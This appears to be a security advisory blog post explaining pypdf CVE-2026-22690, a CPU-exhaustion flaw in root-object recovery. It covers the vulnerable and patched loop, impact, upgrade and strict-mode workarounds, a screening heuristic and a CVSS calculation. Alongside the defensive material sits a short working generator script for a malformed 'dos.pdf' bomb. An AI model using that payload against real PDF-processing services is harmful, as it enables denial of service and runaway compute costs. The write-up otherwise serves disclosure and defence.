To understand the bug, you need to know a tiny bit about PDF structure. A PDF has a "Trailer" dictionary that tells the parser where to start. The most important key in the trailer is /Root, which points to the Document Catalog (the root of the object tree). The trailer also contains a /Size key, which declares the number of entries in the file's cross-reference table (one more than the highest object number).

Here is the logic flaw in pypdf versions prior to 6.6.0: If the /Root key is missing (which makes the PDF technically invalid), the library assumes the file is just slightly corrupted. It activates a "recovery mode" to hunt for the Catalog manually.

How does it know where to look? It asks the /Size key. If the file says, "Hey, I have 100 objects," pypdf iterates through object numbers 1 to 100, resolving each one to see if it looks like a Catalog. The problem is that /Size is just a number written in the file. An attacker can set /Size to 2,147,483,647 (INT_MAX), remove the /Root key, and provide a file with only 1 actual object. The library will then dutifully attempt to resolve 2 billion non-existent objects, burning CPU cycles on dictionary lookups and file seeking for hours.
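To put a rough number on "for hours", here is a back-of-the-envelope sketch. The lookup rate is an assumption picked purely for illustration, not a measurement of pypdf, and the helper name is hypothetical.

```python
INT_MAX = 2_147_483_647  # the /Size value used in the attack described above


def estimated_hours(declared_size: int, lookups_per_second: float) -> float:
    """Hours needed to try every object number up to declared_size."""
    if lookups_per_second <= 0:
        raise ValueError("lookups_per_second must be positive")
    return declared_size / lookups_per_second / 3600


# ASSUMPTION: 100,000 failed lookups per second; real throughput will differ.
print(f"{estimated_hours(INT_MAX, 100_000):.1f} hours")
```

At that assumed rate the loop needs about six hours per file. A slower resolver only makes it worse.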



GHSA-4XC4-762W-M6CG


pypdf CVE-2026-22690: Killing Servers with Kindness

Alon Barad

Software Engineer

Feb 22, 2026 · 6 min read

PoC Available

Executive Summary (TL;DR)

pypdf tries too hard to fix broken PDFs. If a file is missing the Root object but claims to have 2 billion objects in its Size trailer, pypdf will check every single one. This loops until the CPU burns out or the universe ends.

A resource consumption vulnerability in pypdf allows attackers to trigger a Denial of Service via malformed PDF trailers. By removing the '/Root' key and inflating the '/Size' parameter, the library enters an effectively infinite loop trying to 'repair' the file, consuming 100% CPU.

Attack Flow Diagram

The Hook: When Features Become Bugs

We often praise software for being "robust" or "fault-tolerant." In the world of PDF parsing—a format that is essentially a dumpster fire of legacy specs and vendor-specific hacks—libraries have to be forgiving. If a PDF is slightly broken, users expect the library to fix it and show them the content. Enter pypdf, a pure-Python library that powers thousands of document processing pipelines.

But here is the catch: there is a fine line between being helpful and being gullible. CVE-2026-22690 is a classic example of the latter. It is not a memory corruption bug; it is a logic flaw born from kindness. When pypdf encounters a specifically malformed PDF, it doesn't throw an error. Instead, it rolls up its sleeves and attempts a "recovery" operation that an attacker can trick into taking effectively forever.

This isn't about stealing data; it's about freezing the gears of any application that processes untrusted PDFs. Think invoice parsers, resume scanners, or automated archiving bots. One 1KB file can lock up a worker thread indefinitely.

The Flaw: Trusting the /Size

The Code: The Loop of Doom

Let's look at the smoking gun in pypdf/_reader.py. This is the code that runs when strict=False (which is pypdf's default and the usual choice for compatibility).

Vulnerable Code (< 6.6.0):

# Inside PdfReader.root_object
root = self.trailer.get("/Root")
if root is None:
    # Oh no, no Root! Let's find it.
    nb = self.trailer.get("/Size", 0)
    # The Loop of Doom:
    for i in range(nb): 
        # This triggers parsing logic for every theoretical ID
        obj = self.get_object(i + 1)
        if isinstance(obj, DictionaryObject) and obj.get("/Type") == "/Catalog":
            self._validated_root = obj
            break

See that range(nb)? That is the kill switch. The variable nb is taken directly from the attacker-controlled input. There was no cap, no timeout, and no sanity check.

The Fix (v6.6.0):

The maintainers introduced a sanity limit. Even if the file claims to have billions of objects, the recovery logic now gives up after a set number of attempts (default 10,000).

# The patched logic
limit = self.root_object_recovery_limit  # Default 10000
nb = self.trailer.get("/Size", 0)
 
# Bounded range prevents infinite loop
for i in range(min(nb, limit)):
    # ... logic ...

It is a simple fix: never trust the input to define the bounds of your loops.
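The difference is easy to see in a toy model. The sketch below is not pypdf code: it replaces the reader with a plain dict and a hypothetical find_catalog helper, and only mirrors the shape of the two loops shown above (attacker-declared bound versus min(nb, limit)).

```python
from typing import Callable, Optional, Tuple


def find_catalog(
    resolve: Callable[[int], Optional[dict]],
    declared_size: int,
    limit: Optional[int] = None,
) -> Tuple[Optional[dict], int]:
    """Scan object numbers 1..N for a /Catalog dict and count the lookups.

    N is the declared size, capped by `limit` when one is given.
    """
    upper = declared_size if limit is None else min(declared_size, limit)
    lookups = 0
    for i in range(upper):
        lookups += 1
        obj = resolve(i + 1)
        if isinstance(obj, dict) and obj.get("/Type") == "/Catalog":
            return obj, lookups
    return None, lookups


# Toy "file": one dummy object and no catalog, like the malformed PDF.
objects = {1: {}}

_, uncapped = find_catalog(objects.get, declared_size=1_000_000)
_, capped = find_catalog(objects.get, declared_size=1_000_000, limit=10_000)
print(uncapped, capped)  # 1000000 10000
```

In the uncapped call the work is set entirely by the declared size. With a limit, the worst case is fixed by the application no matter what the file claims.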

The Exploit: Building the PDF Bomb

We don't need a complex fuzzer to trigger this. We can write this "exploit" by hand in a text editor. We need a valid PDF header, one dummy object so the parser doesn't crash immediately, and a malicious trailer.

Here is the recipe for disaster:

Header: %PDF-1.7
Body: A single useless object.
Trailer: Omit /Root, set /Size to max integer.

# malicious_gen.py
exploit_pdf = (
    b"%PDF-1.7\n"                 # Header
    b"1 0 obj << >> endobj\n"     # Object 1 (Dummy)
    b"trailer << "
    b"  /Size 2147483647 "        # The Trap: 2 billion objects
    b">>\n"                       # Note: No /Root key!
    b"startxref\n0\n%%EOF"        # End of file
)
 
with open("dos.pdf", "wb") as f:
    f.write(exploit_pdf)

When a vulnerable pypdf instance opens this file and tries to access reader.pages or any property requiring the root, it hits the root_object property. It sees root is missing. It reads /Size. It starts counting. If you monitor the process, you'll see one CPU core instantly pin to 100%. In a single-threaded Python web worker, this request will not return until the web server times it out.
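Because the trigger is two plainly visible properties of the trailer, an upload handler can screen for it before the file ever reaches the parser. The following is a heuristic sketch only: the function name and the threshold are hypothetical, it inspects raw bytes rather than parsing the PDF, and it will not see trailers stored in cross-reference streams.

```python
import re

_SIZE_RE = re.compile(rb"/Size\s+(\d+)")


def trailer_looks_suspicious(data: bytes, max_declared_size: int = 1_000_000) -> bool:
    """Flag a classic trailer that omits /Root and declares a huge /Size.

    ASSUMPTION: max_declared_size is an arbitrary threshold chosen for
    illustration; tune it to the documents you actually expect.
    """
    start = data.rfind(b"trailer")
    if start == -1:
        return False  # no classic trailer keyword, nothing to inspect
    end = data.find(b"startxref", start)
    segment = data[start:] if end == -1 else data[start:end]
    if b"/Root" in segment:
        return False  # a root is present, so recovery would not be triggered
    match = _SIZE_RE.search(segment)
    return match is not None and int(match.group(1)) > max_declared_size
```

A check like this is a cheap early reject, not a substitute for upgrading. It is easy to evade with a different file layout, so treat it as defense in depth.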

The Impact: Why Denial of Service Matters

Security researchers often roll their eyes at DoS bugs because they don't provide a shell. But in the context of modern cloud architecture, this is a wallet-draining vulnerability.

Imagine a SaaS platform that allows users to upload PDFs for OCR or signing. These services often use Python backends (Django/Flask/FastAPI) wrapping pypdf. If an attacker uploads 10 of these 1KB files, they can tie up 10 worker processes for hours, or until something kills them.

If the infrastructure creates new instances to handle load (autoscaling), the attacker just triggered a financial exploit—forcing the victim to pay for compute credits to process a loop that does nothing. Because this happens in user-space Python code, it might not trigger low-level segfault protections. It just sits there, burning electricity.

The Fix: Stopping the Bleeding

The remediation is straightforward, but it requires action. The patch was released in version 6.6.0.

Primary Fix: Update your requirements file immediately.

pip install "pypdf>=6.6.0"

Workaround (If you can't update): If you are stuck on legacy versions, you must instantiate the PdfReader with strict mode enabled. This disables the recovery logic entirely. If a PDF is broken, it will raise an exception instead of looping forever.

from pypdf import PdfReader

# strict=True disables the "best effort" recovery
reader = PdfReader(stream, strict=True)  # stream: a path or binary file object

However, be warned: strict=True is very strict. It will reject many benign-but-slightly-malformed PDFs that users generate from cheap export tools. The only real fix is the patch.
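To confirm that a deployment actually picked up the patched release, a startup check along these lines can help. This is a sketch with hypothetical helper names. It compares only the numeric major.minor.patch part of the version string, so it would treat a pre-release such as a 6.6.0 release candidate as patched.

```python
import re
from importlib import metadata
from typing import Optional, Tuple

FIXED_RELEASE = (6, 6, 0)  # first fixed version according to the advisory


def parse_release(version: str) -> Tuple[int, int, int]:
    """Extract (major, minor, patch) from a version string like '6.5.0'."""
    match = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = (int(part or 0) for part in match.groups())
    return major, minor, patch


def is_patched(version: str) -> bool:
    """True when the given pypdf version is 6.6.0 or newer."""
    return parse_release(version) >= FIXED_RELEASE


def installed_pypdf_is_patched() -> Optional[bool]:
    """Check the installed pypdf; returns None when pypdf is not installed."""
    try:
        return is_patched(metadata.version("pypdf"))
    except metadata.PackageNotFoundError:
        return None
```

Calling installed_pypdf_is_patched() at application startup and refusing to accept uploads when it returns False is one way to keep a stale dependency from slipping into production.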

Official Patches

pypdf PR #3594: Add recovery limit for root object search

Fix Analysis (1)

Technical Appendix

CVSS Score

5.3 / 10

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
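The 5.3 can be reproduced from the vector string. The sketch below follows the CVSS v3.1 base score equations, handles only the Scope: Unchanged case that this vector uses, and uses function names of my own choosing.

```python
import math

# Metric weights from the CVSS v3.1 specification (PR values for Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100_000)
    if scaled % 10_000 == 0:
        return scaled / 100_000.0
    return (math.floor(scaled / 10_000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a CVSS v3.1 vector with Scope: Unchanged."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    if metrics.get("S") != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"))  # 5.3
```

Only availability contributes to impact here (A:L), which is why the score sits in the Medium band even though the attack needs no privileges or user interaction.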

EPSS Probability

0.02%

Top 95% most exploited

Affected Systems

pypdf < 6.6.0
Python applications processing untrusted PDFs
Document ingestion pipelines

Affected Versions Detail

Product	Affected Versions	Fixed Version
pypdf py-pdf	< 6.6.0	6.6.0

Attribute	Detail
CWE	CWE-400 (Uncontrolled Resource Consumption)
CVSS v3.1	5.3 (Medium)
Attack Vector	Network (Context-dependent)
Impact	Denial of Service (High CPU/Hang)
EPSS Score	0.00019 (Low Probability)
KEV Status	Not Listed

MITRE ATT&CK Mapping

T1499: Endpoint Denial of Service

Impact

CWE-400

Uncontrolled Resource Consumption

The software does not properly control the allocation and maintenance of a limited resource (CPU), thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.

Known Exploits & Detection

GitHub (pypdf tests): The official repository contains a test case demonstrating the large /Size parameter triggering the limit.

Vulnerability Timeline

2026-01-07: Fix implemented in PR #3594
2026-01-09: pypdf v6.6.0 released
2026-01-10: CVE-2026-22690 Published